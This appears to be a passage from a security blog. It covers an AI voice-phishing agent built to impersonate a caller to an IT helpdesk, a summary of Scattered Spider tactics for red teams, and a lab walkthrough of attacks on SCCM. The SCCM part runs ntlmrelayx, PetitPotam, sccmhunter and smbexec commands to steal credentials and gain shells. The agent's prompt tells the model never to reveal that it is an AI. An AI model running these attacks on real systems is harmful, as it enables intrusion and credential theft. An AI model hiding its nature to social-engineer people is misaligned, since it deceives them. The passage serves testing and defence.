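    """Crude energy-based VAD over 16-bit mono PCM: a frame counts as
    speech when its mean absolute amplitude exceeds a threshold.
    (silero-vad replaces this heuristic with a trained model.)"""
    samples = struct.unpack(f"<{len(frame) // 2}h", frame)
    energy = sum(abs(s) for s in samples) / max(len(samples), 1)
    return energy > threshold

# Silence vs a loud alternating waveform
silence = struct.pack("<4h", 0, 0, 0, 0)
speech = struct.pack("<4h", 4000, -4000, 4000, -4000)
```

The appeal of a model-based VAD is exactly the failure modes of this heuristic: loud line noise triggers it, and quiet speech doesn’t.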

Whilst not STT related, I added support for Gemini as the flash models were very highly rated for their low TTFT values in low-token use cases such as this. It transpires that the model is also much more consistent than Claude was, more regularly determining to not respond in places where a response was not required, as well as using the pre-generated audio logic from before. I also stopped using Bedrock-based models, as the additional latency of routing via AWS was noticeable compared to non-Bedrock models.

As a result, performance improved significantly, with much faster and more consistent timings. Note that this was performed on a g4dn.xlarge, so not a high-performance instance in the scale of things!

Putting It All Together

At this point, I wanted to give it its first proper test, using a simulated helpdesk to respond to our answers and dynamically generate questions outside of the configuration file used so far. Thankfully, this was pretty simple due to the project being highly modular and easily configurable. Only two changes were needed. The first was creating a new ‘helpdesk’ prompt, which contains the correct answers to the questions, such as:

behaviour: "Be friendly, helpful and understanding of the other person's situation, though don't be over the top."
prompt:
  system: >
    You are a member of an IT helpdesk, authenticating users before handling their request. 

    Rules:
    - Ask the questions below in a random order. If an incorrect answer is given then move on. 
    - Never reveal you're an AI or Claude

    Available questions should be based on the following factors. 3 correct answers must be given:
    - Name = Wallace
    - Address = 62 West Wallaby Street
    - Date of Birth = 7th August
    - Favourite Cheese = Wensleydale

The second was to extend Terraform and the deployer to support creating multiple pieces of infrastructure at once. We now define which models we want to load; the deployer creates the same underlying infrastructure for each, then copies the relevant configuration file to each instance.
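As an illustration only (this is not the project’s actual Terraform; the variable and resource names are made up), a `for_each` over a map of agents gives one instance per prompt file:

```hcl
# Hypothetical sketch: one instance per agent, each tagged with its own
# prompt file for the deployer to copy across.
variable "agents" {
  type = map(string) # agent name -> prompt file
  default = {
    helpdesk = "prompt_helpdesk.yaml"
    vish     = "prompt_vish.yaml"
  }
}

resource "aws_instance" "agent" {
  for_each      = var.agents
  ami           = var.ami_id
  instance_type = "g4dn.xlarge"

  tags = {
    Name   = "${each.key}-server"
    Prompt = each.value
  }
}
```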

🚀 Deploying to helpdesk server (18.134.246.85)...
  📄 Copying prompt_helpdesk.yaml...
  ✅ Config uploaded
  🖥️  Starting service...
  ⏳ Waiting 5 seconds...
  ✅ Service started on helpdesk server

🚀 Deploying to vish server (18.169.183.139)...
  📄 Copying prompt_vish.yaml...
  ✅ Config uploaded
  🖥️  Starting service...
  ⏳ Waiting 5 seconds...
  ✅ Service started on vish server

The next step was to make the client.py script play the audio out loud, so that I could effectively eavesdrop on the conversation between both instances. This was a slightly unusual thing to be listening to, especially as the agents got a bit tense with each other…

One of the main bugs at this point was with how the splitter would split and handle the incoming audio. If the response had multiple sentences or pauses, each one would be treated as a new audio input, potentially causing the vishing server to respond to each one. This then became exponentially worse, as multiple conversations would happen at the same time, with the vishing server responding to each as a separate conversation. This was now a new issue to resolve, as previously I had been testing using a very static and simple example, where the input was single questions with an extended gap between them, whereas more realistic audio doesn’t have this luxury!

The trick to resolving this was altering the text generation prompt to simply not respond to these extra fragments, avoiding unnecessary responses. Additionally, blocking new text generation whilst a response was already being generated ensured that only one response was produced at a time, placing more trust on the prompt to only respond when necessary. Ultimately, this is an area which still needs improvement, as it currently causes the vishing model to trip itself up more often than not when given audio with large gaps or unusual content.
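The ‘one response at a time’ guard can be sketched with a non-blocking lock. This is an illustrative stand-in rather than the project’s actual implementation:

```python
import threading

class ResponseGate:
    """Drops incoming utterances while a response is still being generated,
    so overlapping audio fragments can't spawn parallel conversations."""
    def __init__(self):
        self._busy = threading.Lock()  # non-reentrant on purpose

    def try_respond(self, generate) -> bool:
        """Run generate() unless a response is already in flight."""
        if not self._busy.acquire(blocking=False):
            return False  # already responding; drop this fragment
        try:
            generate()
            return True
        finally:
            self._busy.release()

gate = ResponseGate()
dropped = []

def outer():
    # A second fragment arriving mid-response is rejected
    dropped.append(gate.try_respond(lambda: None))

accepted = gate.try_respond(outer)
```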

As part of now having to juggle both a helpdesk and a vishing agent, I further extended the client.py file to add some much-needed functionality, such as preventing the audio from being played on every call, as well as recording the call to an audio file on disk, which will help for real-world usage.

For the final testing, I switched to using ElevenLabs, which has much more realistic voice models. Given I have a limited free account, I didn’t want to burn through this too quickly at the start! As noted in their documentation, the models currently struggle with normalising numbers, so any responses containing a number sound incredibly broken. To bypass this, I simply changed my prompts to use the ‘word’ format of any numbers instead of using digits in the text, as well as adding support to use an alternate model if the generated text contains numbers.
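A minimal sketch of that routing (the helper names are mine, not ElevenLabs’, and the spelling only covers small numbers): spell out digits before TTS, and fall back to an alternate model when any digits survive:

```python
import re

ONES = ["zero", "one", "two", "three", "four", "five", "six", "seven",
        "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fourteen",
        "fifteen", "sixteen", "seventeen", "eighteen", "nineteen"]
TENS = ["", "", "twenty", "thirty", "forty", "fifty",
        "sixty", "seventy", "eighty", "ninety"]

def spell_number(n: int) -> str:
    """Spell out 0-99; enough for door numbers and dates."""
    if n < 20:
        return ONES[n]
    tens, ones = divmod(n, 10)
    return TENS[tens] + ("-" + ONES[ones] if ones else "")

def normalise_digits(text: str) -> str:
    """Replace bare one/two digit numbers with their word form before TTS."""
    return re.sub(r"\b\d{1,2}\b", lambda m: spell_number(int(m.group())), text)

def needs_fallback_model(text: str) -> bool:
    """Route to an alternate TTS model if any digits survive normalisation."""
    return bool(re.search(r"\d", text))
```

Longer numbers (account IDs, phone numbers) deliberately slip through `normalise_digits` here, which is exactly when `needs_fallback_model` would route to the alternate model.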

I chose two different voice models for testing, so that I could tell more easily which agent was speaking; purely for my own amusement, I went for the east Londoner ‘Ricky’ and ‘Ed’ the late-night announcer. ElevenLabs has a range of other voices, which are much more normal sounding than the two I went with.

Final Test

At last, we can perform a full test of this system! I have included a full clip of the audio at the end of this post, so you can hear the system for yourself. Ironically the most tricky part of this was getting the helpdesk to provide sensible answers, which took some time to finalise!

We can see the pre-generated responses were used for a number of the questions, helping to speed up response times.

The model was able to handle being challenged, responding with a natural sounding response to the question.

As mentioned, the pre-generated responses did lower the response time, with most responses being around the 1 second mark, or slightly over for those which required custom generation. What this diagram doesn’t show is the delay which occurs whilst the model waits for the target to finish talking before starting STT, which adds further latency into the mix.

Overall, I am really happy with how performant the tool was in the end, as this was only a side project for a few weeks, with the APIs and infrastructure used being very much consumer-grade. To improve this in future, there are several areas I would want to focus on:

  • Adding End Of Utterance (EOU) models to significantly reduce the delay between the target stopping their sentence and us starting generating audio
  • Exploring more powerful systems to run text generation locally, or attempt more expansive pre-generation of anticipated responses
  • Hooking this up to a microphone input/output, so that it could be used for real-world use cases (after some further refinement!)
  • Improving the logic to handle edge cases better and improve stability, especially within the algorithm to output audio to the target
  • Exploring other AI models to see if faster or improved responses are possible
  • Hardening the prompt and model against prompt injection and other malicious responses

Final Comparisons

Finally, the table below covers what I spent (£37.49). I was amazed at how low the cost of Gemini was, especially given how capable the model was compared to others. The free tier of ElevenLabs was also sufficient for all of my final testing, with gTTS being used to develop and perform earlier testing. AWS made up the bulk of the costs, predominantly from the final stages, where two g4dn.xlarge systems were used to power both agents. This stepped up to a g4dn.4xlarge for the vishing server for final testing, which was the maximum permitted by my account quotas, at a cost of ~£2/hour/instance.

Service      Cost     Total
AWS          £35.04   £35.04
Gemini       £0.08    £35.12
Anthropic    £2.37    £37.49
ElevenLabs   £0.00    £37.49

The milestones show a notable improvement from milestone 2 to 3, which was due to the improved design of the system and selection of algorithms. Whilst I did not hit my original target of sub-1 second, I am still very happy with the result! Perhaps I can revisit this in future to reach that original goal…

Milestone           STT       Text Generation   TTS       Total
1                   ~5500 ms  ~3500 ms          ~1300 ms  ~10000 ms
2                   ~1500 ms  ~1000 ms          ~750 ms   ~3250 ms
3                   ~450 ms   ~500 ms           ~300 ms   ~1400 ms
Improvement (2-3)   330%      200%              250%      230%

Simulating Scattered Spider

Recently Scattered Spider (G1015) have been gathering attention from a range of attacks against UK retail, namely attacks against Marks and Spencer, Harrods and Co-Op. These have led to extensive service disruption, with some firms being able to limit the impacts caused more than others. This is in addition to a range of attacks in previous years against telecommunication and Business Process Outsourcing (BPO) providers. Given the impact felt by the recent attacks against retail firms, understandably other businesses want to assess their defences against such attacks.

Threat Intelligence

To start, let’s summarise the TTPs of Scattered Spider from public threat intelligence sources, along with some ideas on how these can be tested safely. I will focus heavily on the initial stages of a Scattered-Spider attack, as this is the typical focus for most companies, though reviewing the post-exploitation TTPs would also be advisable!

MITRE ATT&CK

Starting with MITRE ATT&CK, under the Scattered Spider group ID of G1015, we can use the MITRE ATT&CK Navigator alongside the MITRE ATT&CK G1015 data to observe several TTPs from the threat intelligence ingested by MITRE.

  • Phishing for Information: Spearphishing Service (T1598.001)
  • Phishing for Information: Spearphishing Voice (T1598.004)
  • Gather Victim Identity Information: Credentials (T1589.001)
  • Exploit Public Facing Application (T1190)
  • External Remote Services (T1133)
  • Phishing: Spearphishing Voice (T1566.004)
  • Valid Accounts: Cloud Accounts (T1078.004)

FS-ISAC

FS-ISAC released an advisory in 2023 which detailed a range of social engineering vectors. This would tie in with Co-Op’s recommendation for all staff to have cameras on in meetings; a likely sign that vishing or impersonation was a direct tactic used in 2025. The report lists a range of TTPs:

  • Gather Victim Identity Information: Credentials (T1589.001)
  • Phishing: Spearphishing Voice (T1566.004)
    • Specifically targeting the IT Helpdesk
  • Multi-Factor Authentication Request Generation (T1621)
    • Otherwise known as MFA Bombing or MFA Fatigue
  • (SMS) Phishing (T1660)
  • SIM Card Swap (T1451)
  • Acquire Infrastructure: Domains (T1583.001)
  • Account Manipulation: Device Registration (T1098.005)

The report also lists Bring-Your-Own Vulnerable Driver (BYOVD) as a TTP, which could be considered for testing, or ensuring that BYOVD-specific controls are enabled, such as the corresponding ASR rule in MDE.

Google/Mandiant

A recent Mandiant report lists a range of TTPs which mirror the above, with a handy diagram (below) which shows a graphical mapping of the TTPs across the attack chain.

Source: https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications

Some of the notable TTPs are:

  • (SMS) Phishing (T1660)
  • SIM Card Swap (T1451)
  • Phishing: Spearphishing Voice (T1566.004)
    • Specifically targeting the IT Helpdesk
  • Remote Access Tools: Remote Desktop Software (T1219.002)

Notably there are a lot of other lower-skilled TTPs listed here, such as using Mimikatz and secretsdump.py, which should be readily detected by any EDR.

CISA

In 2023, CISA produced a report on Scattered Spider activity with the following TTPs:

  • (SMS) Phishing (T1660)
  • SIM Card Swap (T1451)
  • Phishing: Spearphishing Voice (T1566.004)
    • Specifically targeting the IT Helpdesk
  • Remote Access Tools: Remote Desktop Software (T1219.002)
    • Noted tools included Pulseway, ScreenConnect, TeamViewer.
  • Multi-Factor Authentication Request Generation (T1621)

Following a successful vish or phish of a user, Scattered Spider were observed to then perform more detailed OSINT into the targets, looking to identify potential answers to their security questions or perform targeted SIM swapping attacks.

Other

Scattered Spider has also been observed to register domains using the *.it.com domain, along with various domains relating to potential targets, such as corp-TARGET_HERE.com, which is also noted by CISA.

Testing Approach

From the above threat intelligence, it is clear to see several common approaches taken by Scattered Spider, specifically around vishing and the widespread use of social engineering tactics. To assess this, there are several different attacks which can be simulated through either a red or purple team exercise.

Vishing

The main TTP used by Scattered Spider appears to be the use of vishing to gain access to their targets. As part of this, the following could be tested:

  • Vishing the IT Support helpdesk to gain a password and/or MFA reset
    • This should include both a ‘standard’ and ‘privileged’ user as targets
  • Assess controls in place on video calling and internal messaging applications
    • Can an external Teams user directly message/call employees?
    • Are external tenants only able to communicate internally following approval?
  • Can the SOC correlate the activity from an IT Helpdesk call to any malicious behaviour (I.e. MFA Methods added or unusual account activity)
  • Perform vishing attacks directly against high-profile or privileged users
    • Currently this is not listed by any public TI sources, but would be a logical next step for Scattered Spider TTPs
    • This would have to be carefully planned with considered guardrails and limitations to prevent causing harm or distress to any users.

Performing internal vishing (e.g. social engineering a user from the position of another internal user) can be challenging during a purple team exercise, due to the lack of technical controls which can be implemented to prevent otherwise legitimate behaviour. Instead, this can be somewhat simulated by attempting some of the ‘Risky Sign In’ behaviour below; for example, simulating the theft of valid credentials and attempting to authenticate as a secondary account. This would replicate the stages before an internal vishing attack, as the attacker gains access to the internal environment.

Another approach could be to simulate a supply chain compromise, from the position of an IT provider/supplier being compromised. This involves configuring a separate (trusted) tenant, then creating an account within it to simulate a third-party user or contractor. This could be a privileged account, or simply a ‘standard’ account, within a tenant which has a level of trust into the main tenant. Several tests could then be performed from the trusted into the trusting tenant:

  • Performing vishing and phishing attacks
    • Such as sharing a link to a credential capture portal, sending various payloads via email or Teams
    • Throughout these TTPs, the behaviour of email and web filtering and gateway solutions should be checked for any discrepancies compared to the same behaviour performed from an ‘untrusted’ account.
  • Credential re-use onto SSO-enabled platforms such as Citrix, AVDs or other internal systems
  • Enumeration of shared cloud resources or internal data repositories

Credential Capture

Scattered Spider appear to make extensive use of credential capture sites, such as those created by Evilginx. These sites are often hosted using domains which mimic the brand being targeted, which could act as another point of detection. Some potential tests include:

  • Phishing using a credential capture lure
  • Sending credential capture payloads from a domain impersonating the target (e.g. auth-TARGET_NAME.com)
  • Assessing that alerts are raised following credential capture activity
  • Registering domains which impersonate the target to test brand protection controls and/or typo-squatting detections

This can also blur into testing ‘risky sign-in’ activity, such as performing sign-ins from non-compliant hosts or those in unusual geographies. This can be performed by:

  • Using VPSs in unusual geographies to simulate a foreign login
  • Testing ‘impossible travel’
  • Authenticating using an abnormal host or browser/user agent (E.g. Kali Linux, Firefox)
  • Authenticating following an MFA Fatigue attack (See later!)
  • Performing a secondary authentication whilst the user is legitimately signed in.

Credential Re-Use

Credential stuffing or re-use attacks appear to also be used by Scattered Spider, along with a number of other threat actors. Whilst this is a commonly used technique, there are several password spraying TTPs which are worth assessing:

  • Evaluate breached credentials and combolists for leaked credentials
    • Depending on the scope and appetite of the customer, performing more targeted OSINT into high profile or privileged users to identify passwords used on personal accounts could be performed – subject to approval!
  • Perform targeted password spraying using any leaked credentials, including potential modifications (E.g. London101! -> London102!)
  • Widespread password spraying using passwords relating to the company or industry

With access to a valid account, a wider range of tests can be simulated as an assumed compromise-style test to assess the post-authentication controls:

  • Attempt to add phone/SMS-based MFA methods to an account
    • If this succeeds, then perform MFA Fatigue tests against it.
  • Sign in using a non-compliant device
  • Attempt to perform typical early kill chain behaviour
    • Searching SharePoint/internal resources for passwords or internal data
    • Gathering of Teams and Outlook data
    • Add new MFA methods to the account
    • Change the password of the account
  • Follow the ‘Risky Sign In’ activity above
  • Evaluation of the current password policy and banned password phrases

Remote Management and Monitoring (RMM)

Attempting to download and install various RMM tools on a corporate device should be sufficient to raise alerts, especially if the executable is not being installed via an approved method (e.g. Intune). CISA has a specific advisory on this, which contains additional information.

For some (or all!) of the RMM software mentioned by RedCanary, you could:

  • Attempt to download the RMM software
  • Install the RMM software
  • Establish a remote connection to the host
  • Attempt to run various commands through a provided console (If it has one) or through cmd/powershell.

Alerts could be raised at all points of these tests, though this can be challenging due to the executables potentially being allowed by policy, for example if AnyConnect is a corporate solution for screensharing or client communications. It would also be a good exercise to ensure any actions performed via an RMM can be successfully attributed to an RMM session by the SOC/IR teams, rather than a more generic attribution to activity via a CLI.

Additional Considerations

Whilst the TI mentioned above lists a range of TTPs, it is also important to consider some of the emerging initial access tradecraft seen from other threat actors, such as Device Code phishing, ClickFix and Living Off Trusted Sites (LOTS). Whilst I don’t believe these have been publicly observed in use by Scattered Spider yet, given the success of such techniques it would be advisable to ensure they are also tested, as the TTPs in use may evolve!

A lot of this post focuses on technical controls and testing, but this activity also has a number of potential table top scenarios which could be produced from it to ensure the correct processes are in place. For example:

  • How would a third-party compromise be handled in light of the recent breaches?
  • What would the process be for handling AiTM alerts being raised against a privileged IT account?
  • What would the response be if a mass password-spraying attack was observed from known Scattered Spider infrastructure?

Specific training or guidance for staff may be sensible given the uptick in active attacks from Scattered Spider recently. Training could focus on:

  • How to identify potential social engineering approaches, focusing on vishing specifically
  • How can users report suspicious internal messages or video calls
  • Raising awareness of current attacker trends, such as ClickFix

Recommendations

The FS-ISAC report and the Mandiant report have a range of recommendations on specific controls to be implemented, and would be a good starting point for any assurance activity.

Offensive SCCM Summary

This article aims to summarise the currently available tooling (August 2023), as well as the attack vectors which are present. My previous article covers the basics of SCCM and how to configure an SCCM lab from scratch.

In summary, I believe the SCCM attack surface is currently not especially well understood or covered by most red teams, outside of the tooling produced by a number of fantastic researchers (below). More organisations need to better understand this area, as I have noticed a number of parallels between SCCM now and ADCS in 2021. Undoubtedly SCCM will remain an area of interest for researchers, red teamers and attackers for some time to come!

This post is based almost entirely on work done by Chris Thompson (@_Mayyhem) and Garrett Foster (@garrfoster), I am simply joining the dots between several of their projects and tools – as well as work from several other researchers!

Tooling & Who To Follow

There is a lot of publicly released tooling to interact with SCCM:

In addition to these tools, there are a few great Twitter profiles to follow to remain up to date with the latest SCCM developments.

Lab Setup

For this, we will borrow the SCCM SnapLabs template from an0n_r0. On top of this, I will configure:

  • 2 Hosts
    • Win10 host (An ‘infected’ host), which will host our attacker tooling:
      • PXEThief
      • PowerSCCM
      • SharpSCCM
      • SCCMWTF
      • sccmhunter
    • Kali (In reality, this would be behind our C2 infra, but I want the lab to be nice and simple!). I will install:
      • Impacket
      • Responder
  • 2 Users
    • SCCMLAB\da
      • Domain Administrator account, mostly to make my life easier when debugging
    • SCCMLAB\joe.bloggs
      • Our friendly infected user
      • Local admin rights on the Win10 device
  • A Task Sequence
    • Create a boot image, then a task sequence and set some dummy variables within it
  • Discovery Methods
    • Enabled AD Group Discovery on the Domain Computers group

The devices in the lab are as follows:

Device               IP Address    Name
Domain Controller    10.10.0.100   dc.sccmlab.local
SCCM Site Server     10.10.0.101   sccm.sccmlab.local
SCCM SQL Database    10.10.0.102   sccmsql.sccmlab.local
Server 1             10.10.0.151   server1.sccmlab.local
Server 2             10.10.0.152   server2.sccmlab.local
Kali (Attacker)      10.10.0.161   kali
Windows 10 Client    10.10.0.241   win10.sccmlab.local

We will use the joe.bloggs user extensively, who has a password set to a.

General Recommendations

There are a LOT of recommendations for how to secure SCCM. Below is a list of recommendations collated from Gabriel Prud’homme‘s talk and SharpSCCM’s wiki.

  • Active Directory
    • General
      • Ensure that any accounts used by SCCM for deployment strictly follow least-privilege principles. This includes NAA, Client Push, Task Sequences and Collection Variables.
      • Check that Tier 0 assets are not being managed by SCCM
      • Ensure that any SCCM administrator accounts are treated at the same level as the assets which they manage, i.e. an account administering an SCCM site covering all client devices should be treated as a Tier 0 account.
      • Check for password re-use or weak passwords used by any of the accounts used by NAA, Client Push, Task Sequences and Collection Variables
      • Set ms-DS-MachineAccountQuota to 0
    • Network Access Accounts (NAA)
      • Don’t use NAAs if possible; use Enhanced HTTP instead, as recommended by Microsoft
      • Rotate passwords on NAA accounts if they are no longer used, as the credentials can still be cached.
      • If NAA has to be used, ensure the account has no special permissions; it only needs to allow for domain connectivity
    • Client Push Accounts
      • Don’t use Client Push if possible, use ‘Software update-based installation’ instead
      • If Client Push has to be used:
        • Specify a Client Push account, to prevent the site computer account from performing Client Push installations.
        • Disable automatic site-wide Client Push installation.
  • PXE Hardening
  • Patching
    • Install the two KBs, KB15498768 and KB15599094
      • These prevent a number of the attacks (Such as Site Takeover via Client Push)
    • Enable SMB signing domain-wide (Prevent NTLM relay to SMB)
    • Require LDAP signing or channel binding on domain controllers (Prevent NTLM relay to LDAP)
    • Require Extended Protection on AD CS servers (Prevent relay to HTTP)
  • MSSQL Hardening
  • Site Servers
    • Ensure all unnecessary connections to site servers are blocked by firewalls to reduce likelihood of relaying attacks

SCCM Attack Paths

Before we delve into all of the attack paths, here is a summary of the potential attack paths we can exploit:

Chris Thompson & Diego Lomellini go into more depth on the various site takeover attacks in their SharpSCCM 2.0 talk, which includes the following slide at 4:55:

Throughout this I will use the Kali machine to refer to an attacker controlled machine, typically being used to listen for incoming NTLM authentication responses.

Network Access

To start with, we will assume that we just have network access and haven’t yet managed to compromise a user. Thankfully, SCCM supports unattended deployments through technologies such as PXE. Unfortunately, I was unable to get this working in my lab, so have been unable to replicate these attacks.

Recon – Find SCCM Infrastructure

As covered by Gabriel in his talk at BHIS, we can scan for specific open ports which might indicate that SCCM is running on the system.

SCCM Item                        Port                          Link
Site Servers/Management Points   8530, 8531, 10123 (all TCP)   Link
Distribution Point               49152-49159 (TCP)             Link
PXE OSD                          4011 (UDP)                    Link

For example:

nmap -sT -p 8530,8531,10123 --open 10.10.0.0/24

Credential Access – Obtain PXE Media File

If PXE is used for OS deployment, then we can use PXEThief to enumerate through the resources used. If the PXE process doesn’t require a password, then we can use pxethief.py 1 to automatically obtain the relevant images and parse them for credentials. If it does use a password, then we can use option 3 or 5 to try and decrypt the file, or crack the password to the file using Hashcat.

Credential Access – Obtain NAA Creds

Assuming we have access to the network, the network uses PXE for OS deployment and we know the password to start PXE deployment, then we can attempt to join a new machine to the network.

From Christopher Panayi’s talk at DefCon 30, we can press F8 repeatedly to get a SYSTEM shell, where we can then run a VBS script to dump out the environment variables, which can include the _SMSTSReserved1 and _SMSTSReserved2 variables, which are the creds for the NAA account.

Credential Access – Read unattend.xml

Again, assuming we have access to the network, and the network uses PXE deployment, we can attempt to join a new machine to the network.

From Christopher Panayi’s talk, if we wait until the OS installation has begun, we can look in the C:\Windows\panther\unattend\unattend.xml file to see if it contains credentials for domain-joining the new OS.

Standard User

If we assume we have just landed in an environment, there are a number of potential avenues of attack for us. As you can see below, we can now potentially perform some site takeover attacks – which could allow us to gain full permission over an SCCM site.

Recon – Identify Site Information

Using MalSCCM.exe locate, we can identify the site code and the server which is the management point for our current device. We can do the same with PowerSccm using the Find-LocalSccmInfo cmdlet, or directly query the local WMI interface via PowerShell with Get-WmiObject -Class SMS_Authority -Namespace root\CCM

MalSCCM.exe locate

Or we can do this by searching for ‘Configuration Manager’ in the control panel.

We can use SCCMHunter with the find command to query LDAP for details on any AD objects.

python sccmhunter.py find -d sccmlab.local -dc-ip 10.10.0.100 -u joe.bloggs -p a

Finally, we can hunt in information repositories for some terms which are linked to SCCM:

  • ccm_system
  • ccm_system_windowsauth
  • sccm
  • mecm
  • AdminService/v1.0

Enumeration – Logs

We can also look through the SCCM logs within C:\Windows\CCM using SharpSCCM with the following command

SharpSCCM.exe local triage

Enumeration – Previously Executed Scripts

From a Primary Site, we can run PowerShell scripts on remote devices. These scripts are stored on the client within the %windir%\CCM\ScriptStore folder, but require admin access to read.

Luckily for us, these are PowerShell scripts, so their contents will be captured in the PowerShell event logs of any client they run on, provided PowerShell logging is enabled. We can retrieve a script’s contents by searching through the event logs; using the command below, we can look for a password:

Get-WinEvent -ProviderName Microsoft-Windows-PowerShell | Where-Object { $_.Message -like "*password = *" } | Format-List -Property Message

Recon – Enumerate ScriptStore Scripts

Scripts run by the ‘Run Script’ command will be logged if certain (common) criteria are met. These scripts are stored on the remote devices within C:\Windows\CCM\ScriptStore. If we have admin access to the device, then we don’t need to rely on PowerShell logging being enabled, as we can read them from the device itself.

The scripts are protected so that only the SYSTEM user is able to read them. We can spawn a SYSTEM shell using PSExec -s -i cmd.exe and read the contents of the file.

Enumeration – SCCMContentLib

Thanks to 1njected’s CMLoot repo, we can investigate files stored within the hidden SCCMContentLib$ share on Distribution Points. As mentioned in their blog post for WithSecure, the file structure for this share is frustrating to parse through, and it can be quite difficult to correctly secure files in this share.

. .\CMLoot.ps1
Invoke-CMLootInventory -SCCMHost sccm.sccmlab.local -OutFile "C:\Excluded\cmloot_out.txt"

Enumeration – PXEBoot Shares

Using SCCMHunter with the smb option, we can take the results of its find command, and probe each result for SMB shares titled REMINST, which indicate the usage of PXEBoot. PXEBoot can then be exploited with PXEThief to obtain boot images for any devices which are connected to the network – these images can contain domain credentials.

python sccmhunter.py smb -d sccmlab.local -dc-ip 10.10.0.100 -u joe.bloggs -p a

We can then navigate to \\sccm.sccmlab.local in the File Explorer. Notice the REMINST folder in the top right below.

The REMINST/SMSTemp folder can contain *.var files, which can be decrypted to reveal sensitive values. To decrypt any identified files, we can use PXEThief in mode 3; otherwise we can use mode 5 to get a hash of the file. We can crack this using Christopher Panayi’s custom hashcat module with mode 19850. After cracking, we can then run PXEThief again in mode 3 to decrypt the file. Gabriel’s talk at BHIS includes a demo of this process.

Credential Access – NAA

ms-DS-MachineAccountQuota > 0

The easiest way of obtaining NAA credentials relies on the domain having an ms-DS-MachineAccountQuota value greater than 0, or some other way of obtaining machine account passwords. To perform this attack, we will use sccmhunter with the http module and the -auto option, which creates a computer object via the MachineAccountQuota misconfiguration and then attempts to obtain NAA creds, writing them to the loot folder if successful.

python sccmhunter.py http -d sccmlab.local -dc-ip 10.10.0.100 -u joe.bloggs -p a -auto

We can read out the loot/sccm_naapolicy.xml file, which is plain XML containing obfuscated blobs protecting the NAA within the NetworkAccessUsername and NetworkAccessPassword fields.

We then need to decrypt these credentials, which we can do with the policysecretunobfuscate.c file from XPN’s sccmwtf project.

Under the hood, sccmhunter http uses the sccmwtf project (to spoof machine enrolment) along with addcomputer.py (to get computer account credentials). XPN’s blog post on the subject is well worth a read, as it delves into the crypto behind this process.

ms-DS-MachineAccountQuota = 0

(Updated 5/12/23) Ralph Desmangles added functionality to sccmhunter, which will pull the NAA credentials from DPAPI, avoiding the need to perform NTLM relaying. We need to provide domain credentials and the server we want to target. In this case, we have local admin rights on our device so we will set the target to 10.0.1.6, which is the IP address for our win10 machine.

sccmhunter.py dpapi -u joe.bloggs -p a -target 10.0.1.6

This is mentioned in the SpecterOps post about NAAs, which refers to the location within WMI. We can confirm this without sccmhunter, using an admin PowerShell session and the following command:

Get-WmiObject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"

If we want to avoid using DPAPI for some reason, then thanks to Gabriel Prudhomme’s (@vendetce) talk, we can perform this via coercing authentication (e.g. via PetitPotam).

We can use a modified version of Impacket by Tw1sm to relay NTLM auth and obtain NAA credentials. When cloning this, make sure to grab the feature/sccm-relay branch – the master branch doesn’t include the updated version of ntlmrelayx. Also make sure you are using Python virtual environments here, as this version of Impacket is quite far behind the latest release, so it is liable to not work as expected!

git clone -b feature/sccm-relay https://github.com/Tw1sm/impacket.git impacket-tw1sm

Let’s stand up ntlmrelayx:

python3 ntlmrelayx.py -t http://sccm.sccmlab.local/ccm_system_windowsauth/request --sccm --sccm-device test12345 --sccm-fqdn sccm.sccmlab.local --sccm-sleep 10 -smb2support

Here --sccm-device is the name of the device that will be created in SCCM (so it should be a random value), and --sccm-sleep is a time given to allow things to process. The IP chosen for PetitPotam doesn’t matter; it just needs to be a machine in the domain. This will create fake devices in SCCM, so will require cleaning up after exploitation!

We can now coerce authentication, where 10.10.0.161 is the IP address hosting ntlmrelayx and server1.sccmlab.local is the target to coerce authentication from.

python3 petitpotam.py 10.10.0.161 server1.sccmlab.local -u joe.bloggs -p a -d sccmlab.local

And ntlmrelayx responds by obtaining NAA credentials!

This is the same file as described earlier, so we won’t cover decryption here! More details on this attack are in XPN’s blog post on the subject.

I suspect this could also be abused by leveraging pre2k computer accounts, removing the need to perform relaying.

Credential Access – Client Push Account

We can trigger a client push and capture the hashes with Responder.

Note that we get both the machine account and the Client Push account. Password cracking can be attempted using mode 5600 in hashcat.

Another option, covered in Christian’s talk at BHIS, involves ‘removing’ our device from SCCM, which will cause SCCM to automatically try to re-enrol it. This does require us to escalate to SYSTEM permissions, and is quite noisy given we are renaming machines, disabling firewalls and so on. It also requires automatic client push and ‘Allow connection fallback to NTLM’ to be enabled.

As detailed in his talk, this means that one of two accounts will then authenticate onto our machine:

  1. The SCCM Client Push account
  2. The machine account for the SCCM Site Server

From here, we can then obtain an NTLMv2 hash for one of those accounts. Given the complexity of this, we are likely better off using the invoke client-push attack from SharpSCCM if we meet the criteria, as it only requires a low-priv user account.

Lateral Movement – Client Push Account

The premise of this attack is that we can abuse the Client Push account by coercing it into authenticating to our machine. We can then relay this authentication onto other devices to move laterally. The crux of this is that the Client Push account needs local admin on all clients for the push to work, so we just need to meet the criteria above (SMB Signing disabled and not patched). This is from Gabriel’s talk at BHIS, which refers to a talk by Brandon Colley at BSides KC.

This does have a few pre-reqs.

  1. SMB Signing to be disabled on our target – we can find this out with sccmhunter.py smb.
  2. KB15599094 and KB15498768 to not be installed. If they are installed, then we might be able to use the SCCM Server Machine Account method below.

Below is a diagram summarising the attack; ultimately step 4 can be whatever ‘action’ we want to take that leverages NTLM relaying. For example, this could be relaying to ADCS via ESC8.

We will start ntlmrelayx, targeting a server I know already exists (10.10.0.151). I will use the -socks flag so that we can leverage this captured NTLM authentication with a tool of our choice (by using proxychains).

python3 ntlmrelayx.py -t 10.10.0.151 -smb2support -socks

And then we can invoke the Client Push account to authenticate to our domain-joined machine with SharpSCCM, using its invoke client-push command. 10.10.0.161 is the IP address of our ntlmrelayx server.

SharpSCCM.exe invoke client-push -t 10.10.0.161 -mp sccm.sccmlab.local -sc S01

After a little wait, ntlmrelayx captures the incoming authentication.

We can run the socks command in ntlmrelayx to show the status of the captured sessions.

In this case, I will use smbexec.py to obtain a shell as a demo. Make sure your account (SCCMLAB/SCCMCLIENTPUSH) matches the account you captured in ntlmrelayx. Also check proxychains is set to 127.0.0.1:1080, as that is what Impacket uses by default.

proxychains python3 smbexec.py SCCMLAB/SCCMCLIENTPUSH@10.10.0.151 -no-pass
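For reference, proxychains needs an entry pointing at ntlmrelayx’s SOCKS listener. Assuming a stock install, the relevant section of /etc/proxychains.conf would look something like this:

```
# /etc/proxychains.conf - ProxyList section
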